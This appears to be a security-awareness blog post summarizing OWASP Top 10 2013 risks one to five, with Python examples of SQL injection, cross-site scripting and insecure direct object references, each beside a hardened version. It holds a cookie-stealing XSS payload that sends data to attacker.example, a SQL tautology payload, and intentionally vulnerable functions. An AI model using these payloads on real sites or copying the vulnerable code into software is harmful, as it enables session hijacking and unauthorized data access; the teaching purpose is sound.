OWASP Top 10 - 2013
In this day and age, insecure software is one of the biggest threats to our way of life. Insecure software and weak configurations can undermine our financial, energy, defense, and healthcare systems, and virtually every other piece of critical infrastructure. As our digital infrastructure grows more complex, achieving application security grows harder with it. Luckily, organizations like the Open Web Application Security Project (OWASP for short) help raise awareness by identifying the most critical risks facing organizations today. At Clarity, we will examine how OWASP impacts our community and explain how you can benefit.
What is OWASP?
The Open Web Application Security Project is a non-profit organization devoted to improving the security of software. This open community is dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted. OWASP provides application security standards, cutting-edge research, and a wealth of free tools and documentation to help strengthen the software you build and operate.
OWASP Top 10
In 2013, OWASP updated its Top 10 project to make technology leaders aware of the most critical web application security risks. These risks evolve over time as attackers get smarter and tools change. Below are the first five of the Top 10 web application security risks that could be affecting your business.
1) Injection
Untrusted data is dangerous when it is not handled appropriately. Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
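The SQL case, as an added example that is not part of the original article: a login lookup that concatenates the user's input into the query text, beside the same lookup written with a parameterized query. The table, the two accounts, and the attacker payload are constructed for the demonstration; passwords are stored in plaintext only to keep the injection mechanics visible, never do that in a real application.

```python
import sqlite3

# Constructed sample database (not from the article): one small users table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO users (username, password) VALUES ('alice', 'correct horse')")
    conn.execute("INSERT INTO users (username, password) VALUES ('bob', 'battery staple')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # Untrusted input is spliced into the SQL text, so the interpreter (SQLite)
    # cannot tell attacker-supplied quote characters from the query itself.
    query = (
        "SELECT id, username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    # Parameterized query: the SQL text is fixed and the input travels as bound
    # values, so a quote in the input is data, never syntax.
    query = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


# Constructed attacker input: closes the password string literal and appends a
# tautology, turning the WHERE clause into
#   username = 'alice' AND password = '' OR '1'='1'
# which (AND binds tighter than OR) matches every row in the table.
PAYLOAD = "' OR '1'='1"


def demo():
    """Return (rows leaked by the vulnerable lookup, rows returned by the safe one)."""
    conn = make_db()
    # Legitimate credentials behave identically in both versions.
    assert login_vulnerable(conn, "alice", "correct horse") == [(1, "alice")]
    assert login_safe(conn, "alice", "correct horse") == [(1, "alice")]
    leaked = login_vulnerable(conn, "alice", PAYLOAD)
    blocked = login_safe(conn, "alice", PAYLOAD)
    return len(leaked), len(blocked)


if __name__ == "__main__":
    print("vulnerable rows, safe rows:", demo())
```

Note that the hardened version does not "sanitize" the payload at all; it simply never lets the input reach the SQL parser as text. That is why parameterized queries (or an ORM that uses them underneath) are the fix, not quote-stripping.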
2) Broken Authentication and Session Management
Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities.
3) Cross-Site Scripting (XSS)
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
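The "without proper escaping" part, shown as an added example (not code from the article): a comment renderer that interpolates user text straight into HTML, beside one that encodes it for the context it lands in. The payload and the tiny templates are constructed for the demonstration; the point is that the same input is displayed as text once it is encoded, and that an attribute context needs the quotes encoded as well.

```python
import html

# Constructed attacker input: a script that would ship the victim's session
# cookie to an attacker-controlled host if the browser executed it.
PAYLOAD = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"


def render_comment_vulnerable(author, comment):
    # Untrusted input goes into the page verbatim; the browser parses the
    # <script> tag as markup and runs it in the site's origin.
    return '<p class="comment"><b>%s</b>: %s</p>' % (author, comment)


def render_comment_safe(author, comment):
    # Output encoding for the HTML text context: & < > " ' become entities,
    # so the browser renders the payload as literal text.
    return '<p class="comment"><b>%s</b>: %s</p>' % (
        html.escape(author),
        html.escape(comment),
    )


def render_search_box_safe(query):
    # Attribute context: the value sits inside a double-quoted attribute, so a
    # stray quote could close it and inject new attributes. quote=True (the
    # default) encodes both " and ' as well as the angle brackets.
    return '<input type="text" name="q" value="%s">' % html.escape(query, quote=True)


def contains_live_script(markup):
    # Crude check used by the demo: is there still an unencoded <script tag?
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))
    print(render_comment_safe("mallory", PAYLOAD))
    print(render_search_box_safe('" onfocus="alert(1)'))
```

Encoding is context-specific: the HTML-text encoding above is not sufficient inside a `<script>` block, a URL, or a CSS value, each of which has its own rules. Templating engines that auto-escape by default (and a Content-Security-Policy as a second layer) are how most applications get this right consistently.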
4) Insecure Direct Object References
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key, for example in a URL or form parameter. Without an access control check or other protection, attackers can manipulate these references to access data they are not authorized to see.
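Both defences named above, as an added example rather than code from the article: a lookup that trusts the record id from the request, beside (1) the same lookup with a per-request ownership check and (2) a per-user indirect reference map that hands the client random tokens instead of database keys. The invoice records and user names are constructed for the demonstration.

```python
import secrets

# Constructed sample data (not from the article): invoices keyed by database id.
INVOICES = {
    1001: {"owner": "alice", "total": "120.00"},
    1002: {"owner": "bob", "total": "88.50"},
}


def get_invoice_vulnerable(invoice_id):
    # The id from the request is used directly as the database key with no
    # check that the caller owns it: /invoices/1002 works for anyone who
    # increments the number in the URL.
    return INVOICES.get(invoice_id)


def get_invoice_safe(current_user, invoice_id):
    # Fix 1: keep the direct reference, but enforce access control on every
    # lookup. A foreign record and a missing record get the same answer, so
    # the endpoint cannot be used to enumerate which ids exist.
    invoice = INVOICES.get(invoice_id)
    if invoice is None or invoice["owner"] != current_user:
        return None
    return invoice


class IndirectReferenceMap:
    """Fix 2: expose per-session random tokens instead of real keys.

    The map is built only from records the user may access, so a forged or
    foreign token simply does not resolve to anything.
    """

    def __init__(self, current_user):
        self._to_direct = {}
        for invoice_id, invoice in INVOICES.items():
            if invoice["owner"] == current_user:
                self._to_direct[secrets.token_urlsafe(16)] = invoice_id

    def tokens(self):
        # What the client sees in links and forms.
        return list(self._to_direct)

    def resolve(self, token):
        invoice_id = self._to_direct.get(token)
        return None if invoice_id is None else INVOICES[invoice_id]


if __name__ == "__main__":
    print("no check:", get_invoice_vulnerable(1002))
    print("alice -> bob's invoice:", get_invoice_safe("alice", 1002))
    alice_map = IndirectReferenceMap("alice")
    print("alice's tokens:", alice_map.tokens())
```

Of the two, the explicit ownership check is the one that must always be present; indirect references mainly remove the temptation to guess ids and limit what an attacker learns from the URL.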
5) Security Misconfiguration
Good security requires having a secure configuration defined and deployed for not only the application, but also the frameworks, application server, web server, database server, and platform. Secure settings must be defined, implemented, and maintained, as defaults are frequently insecure. Additionally, all software, including the libraries an application depends on, should be kept up to date.
Learn about risks 6 through 10 and how you can strengthen your organization.